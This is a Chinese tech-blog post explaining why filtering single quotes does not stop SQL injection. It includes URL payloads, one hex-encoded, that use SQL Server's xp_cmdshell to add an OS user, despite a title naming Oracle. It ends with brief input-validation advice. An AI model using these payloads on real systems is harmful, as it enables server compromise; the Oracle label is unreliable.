oracle注入过滤了单引号,sql绕过单引号限制继续注入的解决方法

最新推荐文章于 2024-05-29 14:48:41 发布
最新推荐文章于 2024-05-29 14:48:41 发布
阅读量1.4k 收藏 1
点赞数
文章标签: oracle注入过滤了单引号

在防范sql注入时,对变量过滤不足甚至没有过滤而构造畸形SQL语句,极有可能被成功注入,比如下面这行sql,相当轻松就注入成功了:

代码示例:

http://www./show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--

大家可能觉得变量过滤了'就可以防止SQL Injection攻击,仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:

代码示例:

http://www./show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

是不是跟上面的那句有很大区别?可是效果完全是一样的,其实这些都是SQL语句。

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

这句是“net user angel pass /add”的16进制格式。

先声明一个变量a,然后把指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:

代码示例:

declare @a sysname

select @a=

exec master.dbo.xp_cmdshell @a

解决办法:

过滤变量,限制只允许输入特定字符。

比如对于数字类型的变量就限制只能输入数字类型的数据。

具体在程序中的操作方法,大家在编程时自行实践与总结,从细节入手,对于防范sql 注入务必处处用心啊。

weixin_39547596
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全面试题
weixin_43778463的博客
08-13 2493
网络安全相关面试题
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3836
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
记一次艰难的SQL注入(过安全狗)
最新发布
白帽子凯哥聊黑客
05-29 1207
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
sql注入绕过技巧
m_ing
10-21 1864
前言 今天斗胆来整理一下sql注入的各种绕过姿势,以后方便查阅。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。 1.括号绕过空格 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。 例如: select(user())from dual where
oracle注入靶机,记录一次Oracle注入绕waf
weixin_29359765的博客
04-12 551
这个注入挺特殊的,是ip头注入。我们进行简单的探测:首先正常发起一次请求,我们发现content-type是76探测注入我习惯性的一个单引号:一个单引号我发现长度还是76我开始尝试单引号,双引号一起:我失败了长度还是76一般sql注入输入单引号一般长度都会有些变化。我记录深入探测,我输入'--%20返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。我继续探测:输入--%20...
红帽Redhat—Linux文本处理
m0_52812401的博客
12-30 746
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sql语句中单引号,双引号的处理方法
12-15
SQL语句中,单引号和双引号的处理方式是至关重要的,尤其是在处理字符串、数字、日期和布尔值时。以下是对SQL语句中单引号和双引号处理方法的详细解释: 1. **插入字符串型数据**: 当你需要插入字符串类型的...
浅谈oracle单引号转义
12-16
ORACLE 单引号转义: 在ORACLE中,单引号有两个作用:   1:字符串是由单引号引用   2:转义。  单引号的使用是就近配对,即就近原则。而在单引号充当转义角色时相对不好理解  1.从第二个单引号开始被视为...
oracle插入字符串数据时字符串中有'单引号问题
09-09
Oracle SQL解析器会将单个单引号视为字符串的边界,如果字符串内部出现单引号,它会认为字符串提前结束,从而导致语法错误。为了解决这个问题,我们需要采取一些措施来正确地插入这些特殊字符。 首先,处理含有单...
sql语句中单引号嵌套问题(一定要避免直接嵌套)
12-15
在大多数SQL方言中,包括MySQLSQL Server、Oracle等,如果你的字符串内容里有一个单引号,你需要在它前面再添加一个单引号来进行转义。例如,如果你要搜索包含“标准间”的ROOMTYPE,正确的写法应该是: ```sql @...
mysql注入单引号过滤_避开sql注入过滤的几个方法
weixin_33375360的博客
02-05 6813
有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。唱出会删除或者净化一些字符,或者阻止常用的sql关键词。我们通常有以下几种技巧,去避开这些过滤。1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。A,如果注入一个数字数据字段,就不需要使用单引号。B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。目的其实很...
绕过单引号继续注入
h4ckyou_520的专栏
09-26 1569
<br />Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范 SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键
sql注入绕过(随时更新)
D1stiny的博客
04-03 9596
注入绕过有很多很多种,原理基本类似,在我看来有函数过滤和字符过滤两种。(因为比较菜,所以目前只讲一下字符过滤好了) 这里我选择的是根据实例进行解释(更适合小白)(会在最后进行总结,把各种方式都列出来的) 0x01(这里跟一下隔壁的风) 字符过滤,顾名思义,就是把可能在注入中出现一些字符过滤掉以此来防止注入。 那么问题来了,怎么看他是把哪种字符给过滤了呢? 在之前,我以为是通过报错才进行判断,接触...
mysql 过滤单引号 注入_被过滤了引号的SQL注入如何破?
weixin_39940182的博客
01-19 2467
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤单引号SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8268
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
SQL注入 单引号类型+空格过滤
Auroraxsn的博客
04-24 1972
初始页面: 1.判断注入类型 ?name=root' 页面返回异常,既没有表格内容也没有表格的列名 ?name=root" 页面返回正常,没有表格内容但有表格列名,判断为单引号类型 ?name=root'--+ 页面报错,显示“ERROR NO SPACE”,猜测可能有空格过滤 ?name=root'%23 ?name=root'/**/' ?name=root'and(1=1)%23 页面返回正常,即有表格内容又有表格列名,判断为空格过滤 ...
安全测试:SQL注入攻防
weixin_34324081的博客
06-26 1261
2019独角兽企业重金招聘Python工程师标准>>> ...
oracle注入过滤单引号
06-08
这是因为单引号Oracle SQL语句中字符串值的限定符,如果用户输入的数据中包含单引号,并且没有进行适当的过滤或转义,那么攻击者就可以通过注入恶意的SQL语句来执行任意操作。为了防止这种情况发生,可以使用一些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值